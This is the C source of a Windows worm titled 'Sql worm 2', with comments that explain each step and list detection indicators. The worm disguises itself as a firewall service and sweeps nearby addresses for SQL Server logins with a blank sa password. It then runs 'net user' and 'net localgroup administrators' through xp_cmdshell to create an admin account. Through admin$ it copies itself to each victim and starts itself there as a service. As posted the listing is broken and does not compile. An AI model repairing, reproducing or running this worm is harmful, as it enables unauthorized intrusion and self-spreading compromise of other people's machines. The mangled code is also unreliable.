苏睿暄Sql worm 2的源代码

CODE (listing as posted — it does not compile as-is: backslashes in escape sequences and paths are rendered as '/', several lines lack semicolons, and some identifiers are used without declaration):

#include <stdio.h>
#include <windows.h>
#include <winsvc.h>
#include <wchar.h>
#include <sql.h>
#include <sqlext.h>
#include <lmcons.h>
#include <winsock2.h>
#include <shellapi.h>
#define ServiceName "Microsoft NetWork Services FireWall";// decoy name chosen to look like a legitimate Windows service (note: the trailing ';' becomes part of every expansion)
char RemoteFilePath[128]={0};// UNC path of the copy dropped on a target; built in sqlcmd()
bool ConnIPC(char *RemoteName,char *User,char *Pass);// maps \\RemoteName\ipc$ with the given credentials
long GetLocalIP(void);// local host address, network byte order
DWORD WINAPI Sqlcmd(LPVOID lp);// per-target worker thread (declared as Sqlcmd here, defined below as sqlcmd)
int WINAPI WinMain(HINSTANCE hInstance,HINSTANCE hPrevInstance,LPSTR lpCmdLine,int nCmdShow);// scanner / installer body
SERVICE_STATUS_HANDLE ssh;// handle from RegisterServiceCtrlHandler, shared by the status helpers
SERVICE_STATUS ss;// status record reported to the SCM
/
// Report SERVICE_STOPPED to the SCM for the decoy service (writes global ss, uses global ssh).
void ServiceStopped(void)
{
ss.dwServiceType=SERVICE_WIN32_OWN_PROCESS|SERVICE_INTERACTIVE_PROCESS;
ss.dwCurrentState=SERVICE_STOPPED;
ss.dwControlsAccepted=SERVICE_ACCEPT_STOP;
ss.dwWin32ExitCode=NO_ERROR;
ss.dwCheckPoint=0;
ss.dwWaitHint=0;
SetServiceStatus(ssh,&ss);
return;
}
/
// Report SERVICE_PAUSED to the SCM; used by ServiceMain when the control handler cannot be registered.
void ServicePaused(void)
{
ss.dwServiceType=SERVICE_WIN32_OWN_PROCESS|SERVICE_INTERACTIVE_PROCESS;
ss.dwCurrentState=SERVICE_PAUSED;
ss.dwControlsAccepted=SERVICE_ACCEPT_STOP;
ss.dwWin32ExitCode=NO_ERROR;
ss.dwCheckPoint=0;
ss.dwWaitHint=0;
SetServiceStatus(ssh,&ss);
return;
}
// Report SERVICE_RUNNING to the SCM. Same record as the other helpers, only dwCurrentState differs.
void ServiceRunning(void)
{
ss.dwServiceType=SERVICE_WIN32_OWN_PROCESS|SERVICE_INTERACTIVE_PROCESS;
ss.dwCurrentState=SERVICE_RUNNING;
ss.dwControlsAccepted=SERVICE_ACCEPT_STOP;
ss.dwWin32ExitCode=NO_ERROR;
ss.dwCheckPoint=0;
ss.dwWaitHint=0;
SetServiceStatus(ssh,&ss);
return;
}
/
// Service control handler: STOP reports SERVICE_STOPPED (the process is not otherwise
// torn down here), INTERROGATE re-reports the current status. Other opcodes are ignored.
void WINAPI servier_ctrl(DWORD Opcode)
{
switch(Opcode)
{
case SERVICE_CONTROL_STOP:// stop the service
ServiceStopped();
break;
case SERVICE_CONTROL_INTERROGATE:
SetServiceStatus(ssh,&ss);
break;
}
return;
}
//
// Leftover header comment from whatever this was copied from (it does not describe this body):
// "on a successful process kill set the service status to SERVICE_STOPPED, on failure set SERVICE_PAUSED"
//
// Service entry point: register the control handler, report RUNNING, then hand off to the
// scanner. As written, `WinMain;` only names the function and does not call it, so the
// scanner is never started along the service path in this listing.
void WINAPI ServiceMain(DWORD dwArgc,LPTSTR *lpszArgv)
{
ssh=RegisterServiceCtrlHandler(ServiceName,servier_ctrl);
if(!ssh)
{
ServicePaused();
return;
}
ServiceRunning();
Sleep(100);
WinMain;// expression statement with no effect — not a call
return;
}
/
// Process entry point: hand the decoy service name to the SCM dispatcher, which runs
// ServiceMain when the binary is started as a service. The `WinMain;` afterwards is,
// as in ServiceMain, an expression statement and not a call.
void main(DWORD dwArgc,LPTSTR *lpszArgv)
{
SERVICE_TABLE_ENTRY ste[2];
ste[0].lpServiceName=ServiceName;
ste[0].lpServiceProc=ServiceMain;
ste[1].lpServiceName=NULL;// terminator entry
ste[1].lpServiceProc=NULL;
StartServiceCtrlDispatcher(ste);
WinMain;// no effect — not a call
return;
}
// Scanner / installer body. Not actually reached from main or ServiceMain in this listing,
// since both name WinMain without calling it.
// Install step: if the marker key HKLM\Software\KittyXP.a\Install can be opened, copy the
// running executable to <system dir>\ssrv.exe and (re)create the key. Note the condition is
// that the key ALREADY exists, so a first run on a clean host never installs.
// Scan step: derive a range of addresses from GetLocalIP(), spawn one sqlcmd thread per
// address (the integer loop counter is passed as the LPVOID argument), throttle with a
// semaphore, then repeat forever (`while(a=2)` is an assignment and always true).
// Names used without declaration in this copy: argv, hSemaphore, MaxThread.
// Host artifacts: registry key HKLM\Software\KittyXP.a\Install and file <system dir>\ssrv.exe.
int WINAPI WinMain(HINSTANCE hInstance,
HINSTANCE hPrevInstance,
LPSTR lpCmdLine,
int nCmdShow)
{
int a=2
HANDLE hThread=NULL;
DWORD dwThreadID;
long PreviousCount;
HKEY KittyXPaInstallKey,KittyXPaNewKey;
if(RegOpenKeyEx(HKEY_LOCAL_MACHINE,"Software//KittyXP.a//Install",0,KEY_ALL_ACCESS,&KittyXPaInstallKey)==ERROR_SUCCESS)
{
HMODULE g_module=NULL
char svFileName[512]
g_module=GetModuleHandle(NULL)
GetModuleFileName(g_module,svFileName,512)// path of this executable
char systemdir[512]
GetSystemDirectory(systemdir,512)
lstrcat(systemdir,"//ssrv.exe")// drop location inside the system directory
CopyFile(svFileName,systemdir,false)// bFailIfExists=false: overwrites
RegCreateKey(HKEY_LOCAL_MACHINE,"Software//KittyXP.a//Install",&KittyXPaNewKey);
RegCloseKey(KittyXPaNewKey);
}
int i;
int StartNet;
int StopNet;
int StartHost;// start of the scanned IP range
int StopHost;// end of the scanned IP range

WSADATA wsaData;
struct in_addr host;

WSAStartup(0x202, &wsaData );
StartNet=GetLocalIP();// network-byte-order local address
StopNet=GetLocalIP()+100;// +100 is applied to the network-order value, before ntohl
StartHost=ntohl(StartNet);
StopHost=ntohl(StopNet);
WSACleanup();
do
{

host.S_un.S_addr = inet_addr(argv[1]);// argv is not declared in this function; `host` is never used afterwards
WSAStartup(0x202, &wsaData );

hSemaphore=CreateSemaphore(NULL,MaxThread,MaxThread,NULL);// concurrency cap; hSemaphore/MaxThread undeclared here
if(hSemaphore==NULL)
{

//printf("/nCreateSemaphore failed:%d",GetLastError());
//file://__leave;
}

for(i=StartHost;i<=StopHost;i++)
{
hThread=CreateThread(NULL,0,sqlcmd,(LPVOID)i,0,&dwThreadID);// passes the host counter as the thread argument
if((hThread==NULL)
{
//printf("/nCreate thread failed:%d",GetLastError());
break;
}
//printf(".");
Sleep(10);
CloseHandle(hThread);// detach; completion is tracked via the semaphore only
WaitForSingleObject(hSemaphore,INFINITE);
}
while(1)
{
WaitForSingleObject(hSemaphore,INFINITE);
if(!ReleaseSemaphore(hSemaphore,1,&PreviousCount))
{
//printf("/nmain() ReleaseSemaphore failed:%d",GetLastError());
Sleep(5000);
break;
}
if(PreviousCount==(MaxThread-1))// all worker slots free again
{
//printf("/nAll done.");
break;
}
Sleep(500);
}
CloseHandle(hSemaphore);
WSACleanup();
}
while(a=2);// infinite loop: assignment, always true

return 0;
}

// Return the local host's address in network byte order (inet_addr of inet_ntoa), or 0 if
// gethostbyname fails. Because the printf inside the for loop is commented out, the `return`
// statement IS the loop body: it runs on the first iteration with i==0 and indexes
// h_addr_list[-1], i.e. one entry before the list (undefined behavior). If the list is empty
// the function falls off the end without returning a value.
// Callers in sqlcmd() pass this long where a char* is expected (lstrcat / ConnIPC).
long GetLocalIP(void)
{
char szName[128];
int i;
PHOSTENT pHost;
gethostname(szName, 128);
//printf("%s/n",szName);
pHost = gethostbyname(szName);
if( NULL == pHost )// failed
return 0;
for(i=0;pHost->h_addr_list[i]!=NULL;i++)
//printf("%s/n",inet_ntoa(*((struct in_addr *)pHost->h_addr_list[i])));
return inet_addr(inet_ntoa(*((struct in_addr *)pHost->h_addr_list[i-1])));// loop body; i is 0 here
}

// Per-target worker, started once per scanned address by WinMain via CreateThread.
//  1. Build an ODBC connection string for the target's SQL Server as user "sa" with an empty
//     password and connect (up to 4 attempts, 5 s apart).
//  2. Through master..xp_cmdshell run `net user <name> 123 /add`, then loop running
//     `net localgroup administrators <name> /add` and fetching output until SQLFetch errors.
//  3. Map \\target\ipc$ with that account, copy this executable to
//     \\target\admin$\system32\stg.exe, and create/start it as an auto-start service named
//     ServiceName with binary path "stg.EXE".
// Detection notes: sa logins with an empty password followed by xp_cmdshell executing
// "net user" / "net localgroup administrators"; a new local administrator with password "123";
// stg.exe written through admin$; a service "Microsoft NetWork Services FireWall" pointing at
// "stg.EXE"; outbound TCP 1433 sweeps from the infected host.
// Listing caveats (as posted): `lp` is the integer loop counter cast to a pointer but is used
// as a C string; `cmd`/`Cmd`, `RemotFilePath`/`RemoteFilePath` and `null`/`NULL` are mixed;
// GetLocalIP() returns a long but is passed as a char*; ConnIPC receives the int 123 as Pass;
// backslashes in escapes ("/n", "/0", "/"") and UNC paths appear as '/'.
DWORD WINAPI sqlcmd(LPVOID lp)
{
SQLCHAR Host[512]="";
SQLCHAR *User=";UID=sa";// hard-coded sa login
SQLCHAR *Pass=";PWD=";// empty password
SQLCHAR *Database="";
SQLCHAR InConnectionString[1025]="";
SQLCHAR rowBuff[200]="";
SQLINTEGER iRowBuff;
UCHAR Query[1500]="";
UCHAR Cmd[300]="";
char inBuff[1025]="";
SQLRETURN nResult;
SWORD sLen;
SQLHDBC hDbc;
HSTMT hStmt;
SQLHANDLE hEnvironment;
int retries = 0;
memset(Query,0,1499);
strcpy(Host,lp);// treats the thread argument as a NUL-terminated string
sprintf(InConnectionString,"DRIVER={SQL Server};SERVER=%s%s%s%s",Host,User,Pass,Database);
if (SQLAllocHandle(SQL_HANDLE_ENV,SQL_NULL_HANDLE,&hEnvironment) != SQL_SUCCESS)
{
//printf("SQLAllocHandle returned an error!/n");
return 0;
}

if (SQLSetEnvAttr(hEnvironment, SQL_ATTR_ODBC_VERSION,(SQLPOINTER)
SQL_OV_ODBC3, SQL_IS_INTEGER) != SQL_SUCCESS)
{
//printf("SQLSetEnvAttr returned an error!/n");
return 0;

}

if ((nResult = SQLAllocHandle(SQL_HANDLE_DBC,hEnvironment,(SQLHDBC FAR*)&hDbc)) != SQL_SUCCESS)
{
//printf("SQLAllocHandle returned an error!/n");
return 0;
}

// up to 4 connection attempts, 5 s apart; gives up (returning 0) after the 4th failure
while(retries < 4)
{
nResult = SQLDriverConnect(hDbc,NULL, InConnectionString,
strlen(InConnectionString),
inBuff, 1024, &sLen,
SQL_DRIVER_COMPLETE_REQUIRED);
if(nResult == SQL_SUCCESS || nResult == SQL_SUCCESS_WITH_INFO)
{
//printf("Ok.You have connected to MASTER database.../n");
SQLAllocStmt(hDbc,&hStmt);
break;
}
else
{
if(retries == 3)
{
// the lines below were the continuation of this commented-out printf; they are now dangling string literals
//printf("/nCould not connect to the SQL Server on the target!/n/nMake sure you use !!HOSTNAME NOT IP!!/n"
"If you are using dial-up connection retry for a few times./n"
"If you are sure that SQL server is installed on the target check that port 1433 is open./n"
"If port 1433 is open and you have tried several times to connect, then probably SA does not have a NULL password./n"
"Get a SQL server brute force cracker , try to hack passwords and try again./n"
"If you are a script kiddy then go ( www.technotronic.com or packetstorm.securify.com) , find some documents , read them at least 1 year and try again.:))");

return 0;
}
retries++;
//printf("Performing retry(%d).../n",retries);
Sleep(5000);
}
}
// step 2a: create a local user on the target named after the attacker's address, password "123"
memset(cmd,0,300);
strcpy(cmd,"cmd /c net user ");
lstrcat(cmd,GetLocalIP());// a long is passed where lstrcat expects a string
lstrcat(cmd," 123 /add/r/n");
Cmd[strlen(Cmd)-1]='/0';
sprintf(Query,"EXEC master..xp_cmdshell /"%s/"",Cmd);// OS command execution through xp_cmdshell
//printf("Trying to execute %s on the target/n",Cmd);
if(SQLExecDirect(hStmt,Query,SQL_NTS) != SQL_SUCCESS)
{
//printf("An error occured while performing your query."
"This does not mean that your command is unsuccesfull.../n"
"Check the result.If it didnt work then /n"
"make sure you did not use duplicate keywords with ODBC api/n or the target does not have ' xp_cmdshell ' stored procedure.");
return 0;
}
// step 2b: add that user to the local Administrators group; repeats until SQLFetch stops returning rows
while (nResult != SQL_ERROR)
{
memset(Query,0,1499);
memset(cmd,0,300);
strcpy(cmd,"cmd /c net localgroup administrators ");
lstrcat(cmd,GetLocalIP());
lstrcat(cmd," /add/r/n");
Cmd[strlen(Cmd)-1]='/0';
sprintf(Query,"EXEC master..xp_cmdshell /"%s/"",Cmd);
if(SQLExecDirect(hStmt,Query,SQL_NTS) != SQL_SUCCESS)
{
//printf("An error occured while performing your query."
"This does not mean that your command is unsuccesfull.../n"
"Check the result.If it didnt work then /n"
"make sure you did not use duplicate keywords with ODBC api/n or the target does not have ' xp_cmdshell ' stored procedure.");
return 0;
}
memset(rowBuff,0,99);
nResult = SQLFetch(hStmt);
if (nResult == SQL_ERROR || nResult == SQL_SUCCESS_WITH_INFO)
{
//printf("Error while fething the results from the stored proc./n");
}
if (nResult == SQL_SUCCESS || nResult == SQL_SUCCESS_WITH_INFO){
SQLGetData(hStmt, 1, SQL_C_CHAR, rowBuff, 100, &iRowBuff);// xp_cmdshell output row, discarded
//printf("%s /n",rowBuff);
} else
{
break;
}
}
SQLFreeHandle(SQL_HANDLE_DBC,&hDbc);
SQLFreeHandle(SQL_HANDLE_ENV,&hEnvironment);
SQLFreeHandle(SQL_HANDLE_STMT,&hStmt);
// step 3: lateral movement with the freshly created admin account
if(ConnIPC((char*)lp,(char*)GetLocalIP(),123))// User is the long from GetLocalIP cast to char*; Pass is the int 123
{
memset(RemoteFilePath,0,sizeof(RemoteFilePath));
HMODULE g_module=NULL ;
char svFileName[512];
g_module=GetModuleHandle(NULL);
GetModuleFileName(g_module,svFileName,512);// path of this executable
lstrcat(RemoteFilePath,"");
lstrcat(RemoteFilePath,(char*)lp);
lstrcat(RemoteFilePath,"//admin$//system32//");// admin$ share → target's system32
lstrcat(RemoteFilePath,"stg.exe");// dropped file name on the target
CopyFile(svFileName,RemotFilePath,false);// RemotFilePath is not declared (typo of RemoteFilePath)
bool bRet=FALSE;
SERVICE_STATUS ssStatus;
SC_HANDLE hSCManager=NULL,hSCService=NULL;
__try
{
// open the Service Control Manager on the remote machine
hSCManager=OpenSCManager((char*)lp,NULL,SC_MANAGER_ALL_ACCESS);
if(hSCManager==NULL)
{
//printf("/nOpen Service Control Manage failed:%d",GetLastError());
return 0;
}
//printf("/nOpen Service Control Manage ok!");
// register the dropped copy as an auto-start service under the decoy name
hSCService=CreateService(hSCManager,// handle to SCM database
ServiceName,// name of service to start
ServiceName,// display name
SERVICE_ALL_ACCESS,// type of access to service
SERVICE_WIN32_OWN_PROCESS,// type of service
SERVICE_AUTO_START,// when to start service
SERVICE_ERROR_IGNORE,// severity of service failure
"stg.EXE",// name of binary file (relative path, as written)
NULL,// name of load ordering group
NULL,// tag identifier
NULL,// array of dependency names
NULL,// account name (LocalSystem)
NULL);// account password
//create service failed
if(hSCService==NULL)
{
// if the service already exists, open it instead
if(GetLastError()==ERROR_SERVICE_EXISTS)
{
//printf("/nService %s Already exists",ServiceName);
//open service
hSCService = OpenService(hSCManager, ServiceName, SERVICE_ALL_ACCESS);
if(hSCService==NULL)
{
//printf("/nOpen Service failed:%d",GetLastError());
return 0;
}
//printf("/nOpen Service %s ok!",ServiceName);
}
else
{
//printf("/nCreateService failed:%d",GetLastError());
return 0;
}
}
//create service ok
else
{
//printf("/nCreate Service %s ok!",ServiceName);
}

// start the service
if (StartService(hSCService,0,null))// `null` is not a C identifier here (NULL intended)
{
//printf("/nStarting %s.", ServiceName);
Sleep(20);// keep this under 100 ms
while( QueryServiceStatus(hSCService, &ssStatus ) )
{
if ( ssStatus.dwCurrentState == SERVICE_START_PENDING)
{
//printf(".");
Sleep(20);
}
else
break;
}
if ( ssStatus.dwCurrentState != SERVICE_RUNNING )
//printf("/n%s failed to run:%d",ServiceName,GetLastError());
}
else if(GetLastError()==ERROR_SERVICE_ALREADY_RUNNING)
{
//printf("/nService %s already running.",ServiceName);
}
else
{
//printf("/nStart Service %s failed:%d",ServiceName,GetLastError());
return 0;
}
bRet=TRUE;
}//end of try
__finally
{
// tear down the IPC$ mapping; the `""&lp&"//IPC$"` expression is not valid C string building
WNetCancelConnection2((char*)(""&lp&"//IPC$"),CONNECT_UPDATE_PROFILE,TRUE);
return bRet;
}
}

return 0;
}
// Map \\RemoteName\ipc$ with the given user/password via WNetAddConnection2.
// Returns TRUE only on NO_ERROR. RN is a fixed 50-byte buffer filled with unbounded
// strcat of the caller-supplied name. Called from sqlcmd() with the attacker-address
// account and password "123" created through xp_cmdshell.
bool ConnIPC(char *RemoteName,char *User,char *Pass)
{
NETRESOURCE nr;
char RN[50]="";

strcat(RN,RemoteName);
strcat(RN,"//ipc$");// path separators appear as '/' in this copy

nr.dwType=RESOURCETYPE_ANY;
nr.lpLocalName=NULL;// no drive letter; a UNC (IPC$) session only
nr.lpRemoteName=RN;
nr.lpProvider=NULL;

if(WNetAddConnection2(&nr,Pass,User,FALSE)==NO_ERROR)
return TRUE;
else
return FALSE;
}